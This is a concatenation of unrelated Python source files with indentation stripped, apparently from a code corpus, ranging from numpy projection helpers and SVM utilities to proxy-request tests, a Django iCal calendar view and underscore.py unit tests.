array = array * clamped
if len(size) == 4:
array = array.reshape(-1, size[1], size[2], size[3])
elif len(size) == 2:
array = array.reshape(-1, size[1])
elif ord == float('inf'):
array = numpy.clip(array, a_min=-epsilon, a_max=epsilon)
else:
raise NotImplementedError()
return array
def project_sphere(array, epsilon=1, ord=2):
"""
Compute the orthogonal projection of the input tensor (as vector) onto the L_ord epsilon-ball.
**Assumes the first dimension to be batch dimension, which is preserved.**
:param array: variable or tensor
:type array: torch.autograd.Variable or torch.Tensor
:param epsilon: radius of ball.
:type epsilon: float
:param ord: order of norm
:type ord: int
:return: projected vector
:rtype: torch.autograd.Variable or torch.Tensor
"""
assert isinstance(array, numpy.ndarray), 'given tensor should be numpy.ndarray'
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
array = array/numpy.linalg.norm(array, axis=1, ord=ord).reshape(-1, 1)
array *= epsilon
if len(size) == 4:
array = array.reshape(-1, size[1], size[2], size[3])
elif len(size) == 2:
array = array.reshape(-1, size[1])
return array
def project_orthogonal(basis, vectors, rank=None):
"""
Project the given vectors on the basis using an orthogonal projection.
:param basis: basis vectors to project on
:type basis: numpy.ndarray
:param vectors: vectors to project
:type vectors: numpy.ndarray
:return: projection
:rtype: numpy.ndarray
"""
# The columns of Q are an orthonormal basis of the columns of basis
Q, R = numpy.linalg.qr(basis)
if rank is not None and rank > 0:
Q = Q[:, :rank]
# As Q is orthogonal, the projection is
beta = Q.T.dot(vectors)
projection = Q.dot(beta)
return projection
def project_lstsq(basis, vectors):
"""
Project using least squares.
:param basis: basis vectors to project on
:type basis: numpy.ndarray
:param vectors: vectors to project
:type vectors: numpy.ndarray
:return: projection
:rtype: numpy.ndarray
"""
x, _, _, _ = numpy.linalg.lstsq(basis, vectors)
projection = basis.dot(x)
return projection
def angles(vectors_a, vectors_b):
"""
Compute angle between two sets of vectors.
See https://people.eecs.berkeley.edu/~wkahan/Mindless.pdf.
:param vectors_a:
:param vectors_b:
:return:
"""
if len(vectors_b.shape) == 1:
vectors_b = vectors_b.reshape(-1, 1)
# Normalize vector
norms_a = numpy.linalg.norm(vectors_a, ord=2, axis=0)
norms_b = numpy.linalg.norm(vectors_b, ord=2, axis=0)
norms_a = numpy.repeat(norms_a.reshape(1, -1), vectors_a.shape[0], axis=0)
norms_b = numpy.repeat(norms_b.reshape(1, -1), vectors_b.shape[0], axis=0)
vectors_a /= norms_a
vectors_b /= norms_b
term_1 = numpy.multiply(vectors_a, norms_b) - numpy.multiply(vectors_b, norms_a)
term_1 = numpy.linalg.norm(term_1, ord=2, axis=0)
term_2 = numpy.multiply(vectors_a, norms_b) + numpy.multiply(vectors_b, norms_a)
term_2 = numpy.linalg.norm(term_2, ord=2, axis=0)
angles = 2*numpy.arctan2(term_1, term_2)
return angles
def normalized_non_maximum_entropy_detector(probabilities):
indices = numpy.argmax(probabilities, axis=1)
normalized_probabilities = numpy.copy(probabilities)
normalized_probabilities[numpy.arange(probabilities.shape[0]), indices] = 0
normalized_probabilities = normalized_probabilities/numpy.sum(normalized_probabilities, axis=1).reshape(-1, 1)
from scipy.special import xlogy
confidences = - numpy.sum(xlogy(normalized_probabilities, normalized_probabilities), axis=1)
#confidences /= math.log(probabilities.shape[1])
return confidences
def max_detector(probabilities):
return numpy.max(probabilities, axis=1)
|
497077 | from docutils import nodes
from docutils.parsers.rst import Directive
from docutils.parsers.rst import directives
import urllib.parse
icon = '<svg version="1.1" width="16" height="16" class="octicon octicon-file-code" viewBox="0 0 16 16" aria-hidden="true"><path fill-rule="evenodd" d="M4 1.75C4 .784 4.784 0 5.75 0h5.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v8.586A1.75 1.75 0 0114.25 15h-9a.75.75 0 010-1.5h9a.25.25 0 00.25-.25V6h-2.75A1.75 1.75 0 0110 4.25V1.5H5.75a.25.25 0 00-.25.25v2.5a.75.75 0 01-1.5 0v-2.5zm7.5-.188V4.25c0 .138.112.25.25.25h2.688a.252.252 0 00-.011-.013l-2.914-2.914a.272.272 0 00-.013-.011zM5.72 6.72a.75.75 0 000 1.06l1.47 1.47-1.47 1.47a.75.75 0 101.06 1.06l2-2a.75.75 0 000-1.06l-2-2a.75.75 0 00-1.06 0zM3.28 7.78a.75.75 0 00-1.06-1.06l-2 2a.75.75 0 000 1.06l2 2a.75.75 0 001.06-1.06L1.81 9.25l1.47-1.47z"></path></svg>'
def lazy_iframe(iframe):
return f"""
<div class="lazy-iframe" style="min-height:1px">
<script>
(() => {{
const element = document.currentScript.parentElement;
window.addEventListener("scroll", check);
window.addEventListener("DOMContentLoaded", check);
window.addEventListener("click", check);
if (element.closest(".tabbed-content")) {{
const label = element.closest(".tabbed-content").previousSibling
label.innerHTML = `{icon}` + `<span> ${{label.innerText}} </span>`
}}
function check() {{
setTimeout(() => {{
const rect = element.getBoundingClientRect();
const isVisible = rect.top - window.innerHeight < 500 &&
rect.bottom > -50 &&
rect.width > 0;
if (isVisible) {{
element.outerHTML = `{iframe}`
}}
}}, 100)
}}
}})();
</script>
</div>
"""
def playground(code, height, interactive):
query = urllib.parse.urlencode({"code": code})
src = f'https://playground.clio-lang.org/?hz=true&{query}'
if not interactive:
src += "&run=no&examples=no&share=no&console=no"
params = 'class="playground" loading="lazy" allow="clipboard-read; clipboard-write"'
iframe = f'<iframe {params} src="{src}" width="100%" height="{height}px" frameborder="no"></iframe>'
return lazy_iframe(iframe)
class Playground(Directive):
has_content = True
required_arguments = 0
optional_arguments = 0
option_spec = {'height': directives.nonnegative_int,
'no-interactive': directives.flag}
def run(self):
code = "\n".join(self.content)
height = 'height' in self.options and self.options['height'] or 540
interactive = 'no-interactive' not in self.options
raw = playground(code, height, interactive)
node = nodes.raw("", raw, format='html')
return [node]
def setup(app):
app.add_directive("playground", Playground)
return {
'version': '0.1',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
|
497107 | VERSION_MAJOR = "0"
VERSION_MINOR = "5"
VERSION_TINY = "0"
VERSION = "%s.%s.%s" % (VERSION_MAJOR, VERSION_MINOR, VERSION_TINY)
|
497108 | for i in range(1,100):
if i % 15 == 0:
print("FizzBuzz,", end=' ')
elif i%3==0:
print("Fizz,", end=" ")
elif i%5==0:
print("Buzz,",end=' ')
else:
print(i,",",end=" ")
print(100) |
497133 | import pytest
from socket import inet_aton
from uuid import uuid4
from proxy_requests import ProxyRequests, ProxyRequestsBasicAuth
from proxy_requests import requests
# pytest -rsA tests/test_proxy_requests.py
@pytest.fixture
def henry_post_bucket():
url = 'https://ptsv2.com/t/%s' % str(uuid4()).replace('-', '')
requests.get(url)
return url
def test_get():
r = ProxyRequests('https://api.ipify.org')
r.get()
assert r.get_status_code() == 200
try:
inet_aton(r.__str__())
except Exception:
pytest.fail('Invalid IP address in response')
print(r.get_proxy_used())
def test_get_with_headers():
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequests('https://postman-echo.com/headers')
r.set_headers(h)
r.get_with_headers()
assert r.get_status_code() == 200
assert 'headers' in r.get_json()
print(r.get_proxy_used())
def test_post(henry_post_bucket):
r = ProxyRequests(henry_post_bucket + '/post')
r.post({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(r.get_proxy_used())
def test_post_with_headers(henry_post_bucket):
r = ProxyRequests(henry_post_bucket + '/post')
r.set_headers({'name': 'rootVIII', 'secret_message': '7Yufs9KIfj33d'})
r.post_with_headers({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(r.get_proxy_used())
def test_post_file(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
r = ProxyRequests(henry_post_bucket + '/post')
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_file_with_headers(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequests(henry_post_bucket + '/post')
r.set_headers(h)
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file_with_headers()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_get_with_basic_auth():
url = 'https://postman-echo.com/basic-auth'
r = ProxyRequestsBasicAuth(url, 'postman', 'password')
r.get()
assert r.get_status_code() == 200
assert r.get_json()['authenticated']
print(r.get_proxy_used())
def test_get_with_headers_basic_auth():
url = 'https://postman-echo.com/basic-auth'
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequestsBasicAuth(url, 'postman', 'password')
r.set_headers(h)
r.get_with_headers()
assert r.get_status_code() == 200
assert r.get_json()['authenticated']
print(r.get_proxy_used())
def test_post_with_basic_auth(henry_post_bucket):
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.post({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_with_headers_and_basic_auth(henry_post_bucket):
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.set_headers({'header_key': 'header_value'})
r.post_with_headers({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_file_with_basic_auth(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_file_with_headers_and_basic_auth(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.set_headers(h)
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file_with_headers()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
|
497145 | import numpy as np
import matplotlib.pyplot as plt
import os
from sklearn import svm
from sklearn.decomposition import PCA
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import MinMaxScaler
from sklearn.externals import joblib
import torch
import torchvision
def load(dataloader):
"""Loads/flattens inputs and targets for use in SVM. Returns inputs and targets."""
for data in dataloader:
x,y=data
x=x.view(x.shape[0],-1)
return x,y
def hp_grid(n_components, C_range, gamma_range):
"""Creates and returns list of classifiers with grid of hyperparameters given by C_range and gamma_range."""
clfs=[]
pca=PCA(n_components=n_components)
scaling = MinMaxScaler(feature_range=(-1,1))
for i in C_range:
for j in gamma_range:
svc=svm.SVC(C=i, gamma=j)
clf=make_pipeline(pca, scaling, svc)
clfs.append(clf)
return clfs
def train_grid(clfs, inputs, targets):
"""Trains classifiers in a list; returns list of trained classifiers."""
fitted_clfs=[]
for i in range(len(clfs)):
x=clfs[i].fit(inputs, targets)
fitted_clfs.append(x)
print('Fitted: ', i+1, '/', len(clfs))
return fitted_clfs
def predict_eval(clf, inputs, targets, training=False):
"""Given a classifier and inputs, returns predictions and evaluated classifier accuracy."""
preds=clf.predict(inputs)
num_correct=torch.eq(torch.from_numpy(preds), targets).sum().item()
acc=(num_correct/len(targets))*100
if training:
print('C: ', clf.get_params(deep=True)['svc__C'], 'gamma: ', clf.get_params(deep=True)['svc__gamma'])
print('Training Accuracy: ', acc)
else:
print('Testing Accuracy: ', acc)
return preds, acc
def maxacc_gen(test_accs, train_accs, clfs):
"""Finds and returns model with highest test accuracy and model with train/test accuracy ratio closest to 1."""
test=np.array(test_accs)
train=np.array(train_accs)
maxacc=clfs[np.argmax(test)]
gen=clfs[np.argmin(train-test)]
return maxacc, gen
def save_proba(fn, pipe, inputs, targets):
"""Fits svm with probabilities and saves to disk."""
params=pipe.get_params(deep=True)
pca=PCA(n_components=180)
scaling = MinMaxScaler(feature_range=(-1,1))
pipe_prob=make_pipeline(pca, scaling, svm.SVC(C=params['svc__C'], gamma=params['svc__gamma'], probability=True))
pipe_prob.fit(inputs, targets)
joblib.dump(pipe_prob, fn)
def load_svm(directory, gen=True):
"""Returns loaded SVM saved with classification baselines.
'gen' : Model with train/test accuracy ratio closest to 1.
'maxacc' : Model with highest test accuracy."""
if gen:
clf='gen'
if not gen:
clf='maxacc'
dataset=directory.split('/')[-1]
path='SVM' + dataset + '_' + clf + '_proba.pkl'
svm=joblib.load(os.path.join(directory, path))
return svm
def class_acc(preds, targets, classes):
"Returns classifier accuracy for each class."
correct=0
class_correct=np.zeros(len(classes))
class_total=np.zeros(len(classes))
for j in range(len(targets)):
class_total[targets[j]]+=1
if np.argmax(preds[j])==targets[j]:
class_correct[targets[j]]+=1
correct+=1
class_accuracies=(class_correct/class_total)*100
accuracy=(correct/len(targets))*100
for i in range(len(class_accuracies)):
print('Accuracy of', classes[i], ': ', class_accuracies[i], '%')
print('Total Accuracy: ', accuracy, '%')
|
497223 | import numpy as np
from scipy.stats import norm as ndist
# randomization mechanism
class normal_sampler(object):
"""
Our basic model for noise, and input to
selection algorithms. This represents
Gaussian data with a center, e.g. X.T.dot(y)
in linear regression and a covariance Sigma.
This object emits noisy versions of `center` as
center + scale * N(0, Sigma)
"""
def __init__(self, center, covariance):
'''
Parameters
----------
center : np.float(p)
Center of Gaussian noise source.
covariance : np.float((p, p))
Covariance of noise added (up to scale factor).
'''
(self.center,
self.covariance) = (np.asarray(center),
np.asarray(covariance))
self.shape = self.center.shape
def __call__(self, size=None, scale=1.):
'''
Parameters
----------
size : tuple or int
How many copies to draw
scale : float
Scale (in data units) applied to unitless noise before adding.
Returns
-------
noisy_sample : np.float
Generate noisy version of the center. With scale==0.,
return the full center.
TODO: for some calculations, a log of each call would be helpful
for constructing UMVU, say.
'''
if not hasattr(self, 'cholT'):
self.cholT = np.linalg.cholesky(self.covariance).T
if type(size) == type(1):
size = (size,)
size = size or (1,)
if self.shape == ():
_shape = (1,)
else:
_shape = self.shape
return scale * np.squeeze(np.random.standard_normal(size + _shape).dot(self.cholT)) + self.center
class split_sampler(object):
"""
Data splitting noise source.
This is approximately
Gaussian with center np.sum(sample_stat, 0)
and noise suitably scaled, depending
on splitting fraction.
This object emits noisy versions of `center` as
center + scale * N(0, Sigma)
"""
def __init__(self, sample_stat, covariance): # covariance of sum of rows
'''
Parameters
----------
sample_stat : np.float((n, p))
Data matrix. In linear regression this is X * y[:, None]
covariance : np.float((p, p))
Covariance of np.sum(sample_stat, 0). Could be computed
e.g. by bootstrap or parametric method given a design X.
'''
self.sample_stat = np.asarray(sample_stat)
self.nsample = self.sample_stat.shape[0]
self.center = np.sum(self.sample_stat, 0)
self.covariance = covariance
self.shape = self.center.shape
def __call__(self, size=None, scale=0.5):
'''
Parameters
----------
size : tuple or int
How many copies to draw
scale : float
Scale (in data units) applied to unitless noise before adding.
Returns
-------
noisy_sample : np.float
Generate noisy version of the center. With scale==0.,
return the full center.
The equivalent data splitting fraction is 1 / (scale**2 + 1).
Argument is kept as `scale` instead of `frac` so that the general
learning algorithm can replace this `splitter_source` with a corresponding
`normal_source`.
TODO: for some calculations, a log of each call would be helpful
for constructing UMVU, say.
'''
# (1 - frac) / frac = scale**2
frac = 1 / (scale**2 + 1)
if type(size) == type(1):
size = (size,)
size = size or (1,)
if self.shape == ():
_shape = (1,)
else:
_shape = self.shape
final_sample = []
idx = np.arange(self.nsample)
for _ in range(np.product(size)):
sample_ = self.sample_stat[np.random.choice(idx, int(frac * self.nsample), replace=False)]
final_sample.append(np.sum(sample_, 0) / frac) # rescale to the scale of a sum of nsample rows
val = np.squeeze(np.array(final_sample).reshape(size + _shape))
return val
|
497285 | from torchsupport.data.namedtuple import namedtuple
class Environment:
data_type = namedtuple("Data", [
"state", "action", "rewards", "done"
])
def reset(self):
raise NotImplementedError
def push_changes(self):
pass
def pull_changes(self):
pass
def action_space(self):
raise NotImplementedError
def observation_space(self):
raise NotImplementedError
def is_done(self):
raise NotImplementedError
def observe(self):
raise NotImplementedError
def act(self, action):
raise NotImplementedError
def schema(self):
raise NotImplementedError
|
497335 | import sys
from easyprocess import EasyProcess
python = sys.executable
prog = """
import time
for i in range(3):
print(i, flush=True)
time.sleep(1)
"""
print("-- no timeout")
stdout = EasyProcess([python, "-c", prog]).call().stdout
print(stdout)
print("-- timeout=1.5s")
stdout = EasyProcess([python, "-c", prog]).call(timeout=1.5).stdout
print(stdout)
print("-- timeout=50s")
stdout = EasyProcess([python, "-c", prog]).call(timeout=50).stdout
print(stdout)
|
497344 | def serialize_sqla(data, serialize_date=True):
"""
Serialiation function to serialize any dicts or lists.
This is needed for conversion of sqlalchemy objects to JSON format.
"""
# If has to_dict this is asumed working and it is used
if hasattr(data, 'to_dict'):
return data.to_dict(serialize_date=serialize_date)
# DateTime objects should be returned as isoformat
if hasattr(data, 'isoformat') and serialize_date:
return str(data.isoformat())
# Items in lists are iterated over and get serialized separetly
if isinstance(data, (list, tuple, set)):
return [serialize_sqla(item, serialize_date=serialize_date) for item in
data]
# Dictionaries get iterated over
if isinstance(data, dict):
result = {}
for key, value in list(data.items()):
result[key] = serialize_sqla(value, serialize_date=serialize_date)
return result
# Try using the built in __dict__ functions and serialize that seperately
if hasattr(data, '__dict__'):
return serialize_sqla(data.__dict__, serialize_date=serialize_date)
# Just hope it works
return data
|
497346 | from pydantic import Field
from app.schemas.base import AbstractResourceModel, APIModel
from app.schemas.mixin import TimestampMixin
class BaseHTML(APIModel):
id: str = Field(..., title="SHA256", alias="sha256")
class HTML(AbstractResourceModel, TimestampMixin):
"""HTML"""
id: str = Field(..., title="SHA256", alias="sha256")
ssdeep: str = Field(...)
|
497362 | import unittest
from unittest.mock import patch
from leetcode.coding.editor import edit
class TestEditor(unittest.TestCase):
@patch('leetcode.coding.editor.os.chdir')
@patch('leetcode.coding.editor.subprocess.call')
@patch('leetcode.coding.editor.os.environ.get')
def test_edit(self, mock_get, mock_call, mock_chdir):
mock_get.return_value = ''
edit('', None)
mock_call.assert_not_called()
mock_get.return_value = 'sublime'
edit('file', None)
mock_call.assert_called_once_with('subl file', shell=True)
mock_get.return_value = 'vim'
mock_call.reset_mock()
with patch('leetcode.coding.editor.delay_refresh_detail') as mock_delay:
edit('file', None)
mock_call.assert_called_once_with('vim file', shell=True)
mock_delay.assert_called_once()
|
497470 | import datetime
import vobject
from django import http
from django.shortcuts import get_object_or_404, render
from django.utils.timezone import utc
from django.utils import timezone
from django.core.cache import cache
from django.conf import settings
from django.db.models import Q
from django.core.urlresolvers import reverse
from slugify import slugify
from jsonview.decorators import json_view
from airmozilla.base.utils import get_base_url
from airmozilla.main.templatetags.jinja_helpers import short_desc
from airmozilla.main.models import (
Event,
get_profile_safely,
Location,
Channel,
)
from airmozilla.search.models import SavedSearch
from airmozilla.main.views import is_contributor
from airmozilla.main import forms
def calendar(request):
context = {}
return render(request, 'main/calendar.html', context)
@json_view
def calendar_data(request):
form = forms.CalendarDataForm(request.GET)
if not form.is_valid():
return http.HttpResponseBadRequest(str(form.errors))
start = form.cleaned_data['start']
end = form.cleaned_data['end']
start = start.replace(tzinfo=utc)
end = end.replace(tzinfo=utc)
privacy_filter = {}
privacy_exclude = {}
events = Event.objects.scheduled_or_processing()
if request.user.is_active:
if is_contributor(request.user):
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
else:
privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
events = events.approved()
if privacy_filter:
events = events.filter(**privacy_filter)
elif privacy_exclude:
events = events.exclude(**privacy_exclude)
events = events.filter(
start_time__gte=start,
start_time__lt=end
)
event_objects = []
for event in events.select_related('location'):
start_time = event.start_time
end_time = start_time + datetime.timedelta(
seconds=max(event.duration or event.estimated_duration, 60 * 20)
)
# We don't need 'end' because we don't yet know how long the event
# was or will be.
event_objects.append({
'title': event.title,
'start': start_time.isoformat(),
'end': end_time.isoformat(),
'url': reverse('main:event', args=(event.slug,)),
'description': short_desc(event),
'allDay': False,
})
return event_objects
def calendars(request):
data = {}
locations = []
now = timezone.now()
time_ago = now - datetime.timedelta(days=30)
base_qs = Event.objects.filter(start_time__gte=time_ago)
for location in Location.objects.all().order_by('name'):
count = base_qs.filter(location=location).count()
if count:
locations.append(location)
data['locations'] = locations
if request.user.is_active:
profile = get_profile_safely(request.user)
if profile and profile.contributor:
data['calendar_privacy'] = 'contributors'
else:
data['calendar_privacy'] = 'company'
else:
data['calendar_privacy'] = 'public'
return render(request, 'main/calendars.html', data)
def events_calendar_ical(request, privacy=None, channel_slug=None):
cache_key = 'calendar'
savedsearch = None
if privacy:
cache_key += '_%s' % privacy
if channel_slug:
cache_key += '_%s' % channel_slug
if request.GET.get('ss'):
savedsearch = get_object_or_404(SavedSearch, id=request.GET['ss'])
cache_key += '_%s' % savedsearch.pk
if request.GET.get('location'):
if request.GET.get('location').isdigit():
location = get_object_or_404(
Location,
pk=request.GET.get('location')
)
else:
location = get_object_or_404(
Location,
name=request.GET.get('location')
)
cache_key += str(location.pk)
cached = None
else:
location = None
cached = cache.get(cache_key)
if cached:
# additional response headers aren't remembered so add them again
cached['Access-Control-Allow-Origin'] = '*'
return cached
cal = vobject.iCalendar()
now = timezone.now()
if savedsearch:
base_qs = savedsearch.get_events()
else:
base_qs = Event.objects.scheduled_or_processing()
if channel_slug:
channel = get_object_or_404(
Channel,
slug__iexact=channel_slug
)
channels = Channel.objects.filter(
Q(id=channel.id) |
Q(parent=channel.id)
)
base_qs = base_qs.filter(channels__in=channels)
if privacy == 'public':
base_qs = base_qs.approved().filter(
privacy=Event.PRIVACY_PUBLIC
)
title = 'Air Mozilla Public Events'
elif privacy == 'private':
base_qs = base_qs.exclude(
privacy=Event.PRIVACY_PUBLIC
)
title = 'Air Mozilla Private Events'
else:
title = 'Air Mozilla Events'
if savedsearch:
if savedsearch.name:
title += ' (from saved search "{}")'.format(savedsearch.name)
else:
title += ' (from saved search)'
if location:
base_qs = base_qs.filter(location=location)
cal.add('X-WR-CALNAME').value = title
events = list(base_qs
.filter(start_time__lt=now)
.order_by('-start_time')[:settings.CALENDAR_SIZE])
events += list(base_qs
.filter(start_time__gte=now)
.order_by('start_time'))
base_url = get_base_url(request)
for event in events:
vevent = cal.add('vevent')
vevent.add('summary').value = event.title
vevent.add('dtstart').value = event.start_time
vevent.add('dtend').value = (
event.start_time +
datetime.timedelta(
seconds=event.duration or event.estimated_duration
)
)
vevent.add('description').value = short_desc(event, strip_html=True)
if event.location:
vevent.add('location').value = event.location.name
vevent.add('url').value = (
base_url + reverse('main:event', args=(event.slug,))
)
icalstream = cal.serialize()
# response = http.HttpResponse(
# icalstream,
# content_type='text/plain; charset=utf-8'
# )
response = http.HttpResponse(
icalstream,
content_type='text/calendar; charset=utf-8'
)
filename = 'AirMozillaEvents%s' % (privacy and privacy or '')
if location:
filename += '_%s' % slugify(location.name)
if savedsearch:
filename += '_ss%s' % savedsearch.id
filename += '.ics'
response['Content-Disposition'] = (
'inline; filename=%s' % filename)
if not location:
cache.set(cache_key, response, 60 * 10) # 10 minutes
# https://bugzilla.mozilla.org/show_bug.cgi?id=909516
response['Access-Control-Allow-Origin'] = '*'
return response
|
497513 | import torch
import torch.nn as nn
from torchvision.models import vgg16
class Vgg16(torch.nn.Module):
def __init__(self):
super(Vgg16, self).__init__()
features = list(vgg16(pretrained=True).features)[:23]
self.layers = nn.ModuleList(features).eval()
for param in self.parameters():
param.requires_grad = False
def forward(self, x):
results = []
layers_of_interest = {3, 8, 15, 22}
for i, layer in enumerate(self.layers):
x = layer(x)
if i in layers_of_interest:
results.append(x)
return results
|
497568 | import unittest
from src.underscore import _
class TestObjects(unittest.TestCase):
def test_keys(self):
self.assertEqual(set(_.keys({"one": 1, "two": 2})),
{'two', 'one'}, 'can extract the keys from an object')
def test_values(self):
self.assertEqual(set(_.values({"one": 1, "two": 2})),
{2, 1}, 'can extract the values from an object')
def test_functions(self):
obj = {"a": 'dash', "b": _.map, "c": ("/yo/"), "d": _.reduce}
self.assertEqual(['b', 'd'], _.functions(obj),
'can grab the function names of any passed-in object')
def test_extend(self):
self.assertEqual(_.extend({}, {"a": 'b'}).get("a"), 'b',
'can extend an object with the attributes of another')
self.assertEqual(_.extend({"a": 'x'}, {"a": 'b'}).get(
"a"), 'b', 'properties in source override destination')
self.assertEqual(_.extend({"x": 'x'}, {"a": 'b'}).get(
"x"), 'x', 'properties not in source dont get overriden')
result = _.extend({"x": 'x'}, {"a": 'a'}, {"b": 'b'})
self.assertEqual(result, {"x": 'x', "a": 'a', "b": 'b'},
'can extend from multiple source objects')
result = _.extend({"x": 'x'}, {"a": 'a', "x": 2}, {"a": 'b'})
self.assertEqual(result, {"x": 2, "a": 'b'},
'extending from multiple source'
' objects last property trumps')
result = _.extend({}, {"a": None, "b": None})
self.assertEqual(set(_.keys(result)),
{"a", "b"}, 'extend does not copy undefined values')
def test_pick(self):
result = _.pick({"a": 1, "b": 2, "c": 3}, 'a', 'c')
self.assertTrue(_.isEqual(result, {'a': 1, 'c': 3}),
'can restrict properties to those named')
result = _.pick({"a": 1, "b": 2, "c": 3}, ['b', 'c'])
self.assertTrue(_.isEqual(result, {"b": 2, "c": 3}),
'can restrict properties to those named in an array')
result = _.pick({"a": 1, "b": 2, "c": 3}, ['a'], 'b')
self.assertTrue(_.isEqual(result, {"a": 1, "b": 2}),
'can restrict properties to those named in mixed args')
def test_omit(self):
result = _.omit({"a": 1, "b": 2, "c": 3}, 'b')
self.assertEqual(result, {"a": 1, "c": 3},
'can omit a single named property')
result = _.omit({"a": 1, "b": 2, "c": 3}, 'a', 'c')
self.assertEqual(result, {"b": 2}, 'can omit several named properties')
result = _.omit({"a": 1, "b": 2, "c": 3}, ['b', 'c'])
self.assertEqual(result, {"a": 1},
'can omit properties named in an array')
def test_defaults(self):
options = {"zero": 0, "one": 1, "empty":
"", "nan": None, "string": "string"}
_.defaults(options, {"zero": 1, "one": 10, "twenty": 20})
self.assertEqual(options["zero"], 0, 'value exists')
self.assertEqual(options["one"], 1, 'value exists')
self.assertEqual(options["twenty"], 20, 'default applied')
_.defaults(options, {"empty": "full"},
{"nan": "none"}, {"word": "word"}, {"word": "dog"})
self.assertEqual(options["empty"], "", 'value exists')
self.assertTrue(_.isNone(options["nan"]), "NaN isn't overridden")
self.assertEqual(options["word"], "word",
'new value is added, first one wins')
def test_clone(self):
moe = {"name": 'moe', "lucky": [13, 27, 34]}
clone = _.clone(moe)
self.assertEqual(clone["name"], 'moe',
'the clone as the attributes of the original')
clone["name"] = 'curly'
self.assertTrue(clone["name"] == 'curly' and moe["name"] == 'moe',
'clones can change shallow attributes'
' without affecting the original')
clone["lucky"].append(101)
self.assertEqual(_.last(moe["lucky"]), 101,
'changes to deep attributes are'
' shared with the original')
self.assertEqual(_.clone(1), 1,
'non objects should not be changed by clone')
self.assertEqual(_.clone(None), None,
'non objects should not be changed by clone')
def test_isEqual(self):
obj = {"a": 1, "b": 2}
self.assertTrue(_.isEqual(obj, {"a": 1, "b": 2}), "Object is equal")
obj = {"a": 1, "b": {"c": 2, "d": 3, "e": {"f": [1, 2, 3, 4, 5]}}}
self.assertTrue(_.isEqual(
obj, {"a": 1, "b": {"c": 2, "d": 3, "e": {"f": [1, 2, 3, 4, 5]}}}),
"Object is equal")
obj = [1, 2, 3, 4, [5, 6, 7, [[[[8]]]]]]
self.assertTrue(
_.isEqual(obj, [1, 2, 3, 4, [5, 6, 7, [[[[8]]]]]]),
"Object is equal")
obj = None
self.assertTrue(_.isEqual(obj, None), "Object is equal")
obj = 1
self.assertTrue(_.isEqual(obj, 1), "Object is equal")
obj = "string"
self.assertTrue(_.isEqual(obj, "string"), "Object is equal")
def test_isEmpty(self):
self.assertTrue(not _([1]).isEmpty(), '[1] is not empty')
self.assertTrue(_.isEmpty([]), '[] is empty')
self.assertTrue(not _.isEmpty({"one": 1}), '{one : 1} is not empty')
self.assertTrue(_.isEmpty({}), '{} is empty')
self.assertTrue(_.isEmpty(None), 'null is empty')
self.assertTrue(_.isEmpty(), 'undefined is empty')
self.assertTrue(_.isEmpty(''), 'the empty string is empty')
self.assertTrue(not _.isEmpty('moe'), 'but other strings are not')
obj = {"one": 1}
obj.pop("one")
self.assertTrue(_.isEmpty(obj),
'deleting all the keys from an object empties it')
pass
def test_isType(self):
# put all the types here and check each for true
pass
class Namespace:
pass
def test_tap(self):
ns = self.Namespace()
ns.intercepted = None
def interceptor(obj):
ns.intercepted = obj
returned = _.tap(1, interceptor)
self.assertEqual(ns.intercepted, 1,
"passes tapped object to interceptor")
self.assertEqual(returned, 1, "returns tapped object")
returned = _([1, 2, 3]).chain().map(
lambda n, *args: n * 2).max().tap(interceptor).value()
self.assertTrue(returned == 6 and ns.intercepted == 6,
'can use tapped objects in a chain')
def test_pairs(self):
r = _.pairs({"one": 1, "two": 2})
self.assertEqual(sorted(r), [["one", 1], ["two", 2]],
'can convert an object into pairs')
def test_invert(self):
obj = {"first": 'Moe', "second": 'Larry', "third": 'Curly'}
r = _(obj).chain().invert().keys().join(' ').value()
self.assertEqual(set(r), set('Larry Moe Curly'),
'can invert an object')
self.assertEqual(_.invert(_.invert(obj)), obj,
"two inverts gets you back where you started")
def test_matches(self):
moe = {"name": '<NAME>', "hair": True}
